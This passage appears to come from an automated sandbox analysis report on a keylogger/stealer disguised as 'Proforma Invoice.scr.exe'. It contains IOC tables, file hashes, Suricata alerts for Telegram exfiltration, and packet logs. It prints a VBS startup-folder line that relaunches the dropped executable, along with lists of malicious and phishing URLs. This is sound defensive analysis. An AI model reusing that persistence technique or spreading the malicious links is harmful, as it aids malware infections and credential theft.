                                                                                        • 173.237.185.182
                                                                                        RFQ -SCHOTTEL Type SRP200.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        invoice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        New-Order534211.scr.exeGet hashmaliciousUnknownBrowse
                                                                                        • 173.237.185.182
                                                                                        s-part-0017.t-0009.fb-t-msedge.nethttps://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!s599af221dbfd41b9a607812ebc66d2cf&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0VpSHltbG45MjdsQnBnZUJMcnhtMHM4QjRNbHFPTTJWd0ZlQTFNLWNhZ0lnRkE_ZT1aak8wczY&wd=target%28Sezione%20senza%20titolo.one%7C99ad2a4b-5ecc-495f-9ce8-040ac62eb8f2%2F%5BExternal%5D%20-%20Invoice%20%27s%208808-%7C9e6e973e-3cda-429a-a28f-c51dc242e5b1%2F%29&wdorigin=NavigationUrlGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.253.45
                                                                                        PROFORMA FATURA pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 13.107.253.45
                                                                                        Orden de compra.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.253.45
                                                                                        whatsappjpg.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                        • 13.107.253.45
                                                                                        http://www.thearchiterra.gr/Get hashmaliciousUnknownBrowse
                                                                                        • 13.107.253.45
                                                                                        UCLouvain.onepkgGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.253.45
                                                                                        https://www.kwconnect.com/redirect?url=https%3A%2F%2Fwww.ingenieriawj.com/trx/#XdGFtYXJhLnBlcmVpcmFkZWplc3VzQGRhaWljaGktc2Fua3lvLmV1Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 13.107.253.45
                                                                                        67JPbskewt.exeGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.253.45
                                                                                        Receipt.htmGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.253.45
                                                                                        https://1rkzzyapew.beefreedesign.com/EfTl-assets-eurmktdynamicsGet hashmaliciousUnknownBrowse
                                                                                        • 13.107.253.45
                                                                                        api.ipify.orgfile.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                        • 104.26.12.205
                                                                                        #Uad6c#Ub9e4 #Uc8fc#Ubb38 658749 #Ubc0f 658752..exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 172.67.74.152
                                                                                        Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                        • 172.67.74.152
                                                                                        https://www.canva.com/design/DAGVD7_HMvQ/PFkDB3TDx6Ru4nNALhSqqQ/view?utm_content=DAGVD7_HMvQ&utm_campaign=designshare&utm_medium=link&utm_source=editorGet hashmaliciousUnknownBrowse
                                                                                        • 104.26.13.205
                                                                                        phish_alert_sp2_2.0.0.0.emlGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.26.12.205
                                                                                        https://schiller.life/Get hashmaliciousHTMLPhisherBrowse
                                                                                        • 104.26.12.205
                                                                                        SecuriteInfo.com.Win32.PWSX-gen.31738.17793.exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 104.26.12.205
                                                                                        Biocon-In-Service Agreement.pdfGet hashmaliciousEvilProxy, HTMLPhisherBrowse
                                                                                        • 104.26.13.205
                                                                                        skuld3.exeGet hashmaliciousSkuld StealerBrowse
                                                                                        • 104.26.13.205
                                                                                        Shipping documents 00039984849900044800.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                        • 104.26.12.205

                                                                                        ASNs

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        TELEGRAMRUMP2318GJ-P 18000pcs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        Quotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        clipper.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        Invoices.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        FERRO FAB INV.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        SecuriteInfo.com.BackDoor.AgentTeslaNET.20.28177.5145.exeGet hashmaliciousDarkCloudBrowse
                                                                                        • 149.154.167.220
                                                                                        PRESUPUESTO DE NOVIEMBRE...exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 149.154.167.220
                                                                                        PO Number- 4900003753.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        Purchase Order 17025.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 149.154.167.220
                                                                                        file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, XmrigBrowse
                                                                                        • 149.154.167.99
                                                                                        CLOUDFLARENETUShttp://www.thearchiterra.gr/Get hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        MP2318GJ-P 18000pcs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 188.114.97.3
                                                                                        hesaphareketi-01.exeGet hashmaliciousMassLogger RATBrowse
                                                                                        • 188.114.96.3
                                                                                        file.exeGet hashmaliciousCredGrabber, Meduza StealerBrowse
                                                                                        • 104.26.12.205
                                                                                        https://dzentec-my.sharepoint.com/:u:/g/personal/i_lahmer_entec-dz_com/EdYp5IxQ-uxJivnPAqSzv40BZiCX7sphz7Kj8JDyRBKqpQ?e=wqutC4Get hashmaliciousUnknownBrowse
                                                                                        • 188.114.96.3
                                                                                        https://onedrive.live.com/view.aspx?resid=8656653D19C3C7C0!s599af221dbfd41b9a607812ebc66d2cf&migratedtospo=true&redeem=aHR0cHM6Ly8xZHJ2Lm1zL28vYy84NjU2NjUzZDE5YzNjN2MwL0VpSHltbG45MjdsQnBnZUJMcnhtMHM4QjRNbHFPTTJWd0ZlQTFNLWNhZ0lnRkE_ZT1aak8wczY&wd=target%28Sezione%20senza%20titolo.one%7C99ad2a4b-5ecc-495f-9ce8-040ac62eb8f2%2F%5BExternal%5D%20-%20Invoice%20%27s%208808-%7C9e6e973e-3cda-429a-a28f-c51dc242e5b1%2F%29&wdorigin=NavigationUrlGet hashmaliciousUnknownBrowse
                                                                                        • 104.21.14.84
                                                                                        Quotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 188.114.96.3
                                                                                        PROFORMA FATURA pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 188.114.97.3
                                                                                        http://www.thearchiterra.gr/Get hashmaliciousUnknownBrowse
                                                                                        • 104.17.25.14
                                                                                        clipper.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 188.114.96.3
                                                                                        INTELLECTICA-USINQ-40152.scrGet hashmaliciousUnknownBrowse
                                                                                        • 173.237.185.182
                                                                                        RFQ-2413AM-KE2800.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        PO No. 24156.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        PO 0087900.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        PO 2024-91113.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        RFQ-00032035.pdf.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        RFQ-00032035.PDF.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        RFQ -SCHOTTEL Type SRP200.scr.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        invoice.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        New-Order534211.scr.exeGet hashmaliciousUnknownBrowse
                                                                                        • 173.237.185.182

                                                                                        JA3 Fingerprints

                                                                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                        3b5074b1b5d032e5620f69f9f700ff0eMP2318GJ-P 18000pcs.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        • 149.154.167.220
                                                                                        • 104.26.13.205
                                                                                        Quotation.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 173.237.185.182
                                                                                        • 149.154.167.220
                                                                                        • 104.26.13.205
                                                                                        clipper.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        • 149.154.167.220
                                                                                        • 104.26.13.205
                                                                                        Invoices.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        • 149.154.167.220
                                                                                        • 104.26.13.205
                                                                                        FERRO FAB INV.pdf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        • 149.154.167.220
                                                                                        • 104.26.13.205
                                                                                        #Uad6c#Ub9e4 #Uc8fc#Ubb38 658749 #Ubc0f 658752..exeGet hashmaliciousAgentTeslaBrowse
                                                                                        • 173.237.185.182
                                                                                        • 149.154.167.220
                                                                                        • 104.26.13.205
                                                                                        https://invite.bublup.com/q6fU7gLtMrfSGet hashmaliciousHTMLPhisherBrowse
                                                                                        • 173.237.185.182
                                                                                        • 149.154.167.220
                                                                                        • 104.26.13.205
                                                                                        Quotation.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                        • 173.237.185.182
                                                                                        • 149.154.167.220
                                                                                        • 104.26.13.205
                                                                                        PRESUPUESTO DE NOVIEMBRE...exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                        • 173.237.185.182
                                                                                        • 149.154.167.220
                                                                                        • 104.26.13.205
                                                                                        PO Number- 4900003753.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                        • 173.237.185.182
                                                                                        • 149.154.167.220
                                                                                        • 104.26.13.205

                                                                                        Dropped Files

                                                                                        No context

                                                                                        Created / dropped Files

                                                                                        C:\Users\user\AppData\Roaming\EncoderFallback.exe

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\Proforma Invoice.scr.exe
                                                                                        File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Category:dropped
                                                                                        Size (bytes):13312
                                                                                        Entropy (8bit):4.715172253794978
                                                                                        Encrypted:false
                                                                                        SSDEEP:192:Z6F7KvWISi8OXTjyr4mikpAfQZz/IJCKVxmy:ZZNSEDjyHikpAIZz/In
                                                                                        MD5:3EFCF6123CC2697D54BE8E8D17F70EB6
                                                                                        SHA1:194D4304E6FBEA7BCC5203D9F5DD7C0883277FB1
                                                                                        SHA-256:A05ACADB64D5923E931A42AECCA755B6A160B39F96EC1BFF8611CD5116B4C926
                                                                                        SHA-512:73AC5727E012611904CA6BE764A92DB67CBEA082CDACA37017E1B6DB04FEE6BAE884AAF82DCF4EB36094012463DCFD0B5BEECFC36048D87DB01F17DAFE7C32A9
                                                                                        Malicious:true
                                                                                        Antivirus:
                                                                                        • Antivirus: Avira, Detection: 100%
                                                                                        • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                        • Antivirus: ReversingLabs, Detection: 61%
                                                                                        Reputation:low
                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M.!g....................."......>.... ...@....@.. ....................................`..................................-..O....@.......................`....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........@... ..................@..@.reloc.......`.......2..............@..B................ .......H.......0"...............................................................~....%:....&~..........s....%.....s....(....*.s.........*..(....*...0..N..........s....r...ps....(....o..........&.....9....(......rQ..p(....o.....r...p(....o......o.....o....o.....s..........s ...........io!.....o".....+.....9......o#......9......o#.....9.....o#.......($.....s%...%r...po&...%r)..po&.......o'...o(...9Y.....o)........8@...............$...(*........o+...(,...(...+o....&.....&........X.....

                                                                                        C:\Users\user\AppData\Roaming\EncoderFallback.exe:Zone.Identifier

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\Proforma Invoice.scr.exe
                                                                                        File Type:ASCII text, with CRLF line terminators
                                                                                        Category:modified
                                                                                        Size (bytes):26
                                                                                        Entropy (8bit):3.95006375643621
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:ggPYV:rPYV
                                                                                        MD5:187F488E27DB4AF347237FE461A079AD
                                                                                        SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                        SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                        SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                        Malicious:true
                                                                                        Reputation:high, very likely benign file
                                                                                        Preview:[ZoneTransfer]....ZoneId=0

                                                                                        C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\EncoderFallback.vbs

                                                                                        Download File
                                                                                        Process:C:\Users\user\Desktop\Proforma Invoice.scr.exe
                                                                                        File Type:ASCII text, with no line terminators
                                                                                        Category:dropped
                                                                                        Size (bytes):93
                                                                                        Entropy (8bit):4.768652287031278
                                                                                        Encrypted:false
                                                                                        SSDEEP:3:FER/n0eFHHoN+EaKC5aHE1NHn:FER/lFHIN7aZ5aHEX
                                                                                        MD5:F518BAF451028C74555DE83F663A00C5
                                                                                        SHA1:8D58AEC0203829C98C7D9145E1F0B2295B5AB54F
                                                                                        SHA-256:D0B9F1092C93EA673161222345C664A92E6D19937748DEA7950DE5AD1D545C5D
                                                                                        SHA-512:A23E718787E5095ED8F5567C693C5492B9A9E0215D46000A28EBD6566D34C25E8378C1E93323B996B710AF6CE011C8347F95472061F90024C46B717C6BECA426
                                                                                        Malicious:true
                                                                                        Reputation:low
                                                                                        Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\EncoderFallback.exe"""

                                                                                        Static File Info

                                                                                        General

                                                                                        File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                        Entropy (8bit):4.715172253794978
                                                                                        TrID:
                                                                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                        • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                        • DOS Executable Generic (2002/1) 0.01%
                                                                                        File name:Proforma Invoice.scr.exe
                                                                                        File size:13'312 bytes
                                                                                        MD5:3efcf6123cc2697d54be8e8d17f70eb6
                                                                                        SHA1:194d4304e6fbea7bcc5203d9f5dd7c0883277fb1
                                                                                        SHA256:a05acadb64d5923e931a42aecca755b6a160b39f96ec1bff8611cd5116b4c926
                                                                                        SHA512:73ac5727e012611904ca6be764a92db67cbea082cdaca37017e1b6db04fee6bae884aaf82dcf4eb36094012463dcfd0b5beecfc36048d87db01f17dafe7c32a9
                                                                                        SSDEEP:192:Z6F7KvWISi8OXTjyr4mikpAfQZz/IJCKVxmy:ZZNSEDjyHikpAIZz/In
                                                                                        TLSH:F8522714B3658726CCD54BF25EE3C3342370E745BA87DB1E76C22A0F7D953026822B95
                                                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...M.!g....................."......>.... ...@....@.. ....................................`................................

                                                                                        File Icon

                                                                                        Icon Hash:70cccc8692968ec8

                                                                                        Static PE Info

                                                                                        General

                                                                                        Entrypoint:0x402e3e
                                                                                        Entrypoint Section:.text
                                                                                        Digitally signed:false
                                                                                        Imagebase:0x400000
                                                                                        Subsystem:windows gui
                                                                                        Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                        DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                        Time Stamp:0x67210A4D [Tue Oct 29 16:16:13 2024 UTC]
                                                                                        TLS Callbacks:
                                                                                        CLR (.Net) Version:
                                                                                        OS Version Major:4
                                                                                        OS Version Minor:0
                                                                                        File Version Major:4
                                                                                        File Version Minor:0
                                                                                        Subsystem Version Major:4
                                                                                        Subsystem Version Minor:0
                                                                                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                        Entrypoint Preview

                                                                                        Instruction
                                                                                        jmp dword ptr [00402000h]
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al
                                                                                        add byte ptr [eax], al

                                                                                        Data Directories

                                                                                        NameVirtual AddressVirtual Size Is in Section
                                                                                        IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IMPORT0x2dec0x4f.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE0x40000x1eba.rsrc
                                                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC0x60000xc.reloc
                                                                                        IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                                                        IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                                        Sections

                                                                                        NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                        .text0x20000xe440x1000f0079c6edf29c5a0603144764e541d27False0.537109375data5.0499331097335824IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                        .rsrc0x40000x1eba0x20000e5638f12d047e611bf41ac2fa3baa56False0.3956298828125data4.618045605339171IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                        .reloc0x60000xc0x200103696a02112831d849604d6b00ad7aeFalse0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                                        Resources

                                                                                        NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                        RT_ICON0x41300x1870Device independent bitmap graphic, 35 x 84 x 32, image size 58800.4040920716112532
                                                                                        RT_GROUP_ICON0x59a00x14data1.1
                                                                                        RT_VERSION0x59b40x31cdata0.43090452261306533
                                                                                        RT_MANIFEST0x5cd00x1eaXML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators0.5489795918367347

                                                                                        Imports

                                                                                        DLLImport
                                                                                        mscoree.dll_CorExeMain

                                                                                        Network Behavior

                                                                                        Suricata IDS Alerts

                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                        2024-10-31T11:14:22.467203+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.649818TCP
                                                                                        2024-10-31T11:14:34.440817+01002851779ETPRO MALWARE Agent Tesla Telegram Exfil1192.168.2.649879149.154.167.220443TCP
                                                                                        2024-10-31T11:14:34.440817+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.649879149.154.167.220443TCP
                                                                                        2024-10-31T11:14:36.494538+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.649890149.154.167.220443TCP
                                                                                        2024-10-31T11:14:51.363526+01002022930ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow120.109.210.53443192.168.2.651758TCP
                                                                                        2024-10-31T11:14:58.092083+01002851779ETPRO MALWARE Agent Tesla Telegram Exfil1192.168.2.651775149.154.167.220443TCP
                                                                                        2024-10-31T11:14:58.092083+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.651775149.154.167.220443TCP
                                                                                        2024-10-31T11:14:59.486489+01002852815ETPRO MALWARE Agent Tesla Telegram Exfil M21192.168.2.651776149.154.167.220443TCP

                                                                                        Network Port Distribution

                                                                                        TCP Packets

                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                        Oct 31, 2024 11:14:06.311638117 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:06.311666965 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:06.311743021 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:06.756143093 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:06.756161928 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:07.390291929 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:07.390443087 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:07.487104893 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:07.487128973 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:07.487484932 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:07.533545971 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:07.960087061 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.003331900 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.092302084 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.092331886 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.092340946 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.092387915 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.092400074 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.092432976 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.142915964 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.210230112 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.210243940 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.210290909 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.210304976 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.210392952 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.210695028 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.210701942 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.210777998 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.328969002 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.328984022 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.329078913 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.329546928 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.329555035 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.329732895 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.447479963 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.447493076 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.447654963 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.448041916 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.448117018 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.566170931 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.566266060 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.566816092 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.566895008 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.684581995 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.684705973 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.685129881 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.685252905 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.803282976 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.803394079 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.803821087 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.803890944 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.804177999 CET44349737173.237.185.182192.168.2.6
                                                                                        Oct 31, 2024 11:14:08.804254055 CET49737443192.168.2.6173.237.185.182
                                                                                        Oct 31, 2024 11:14:08.922250986 CET44349737173.237.185.182192.168.2.6
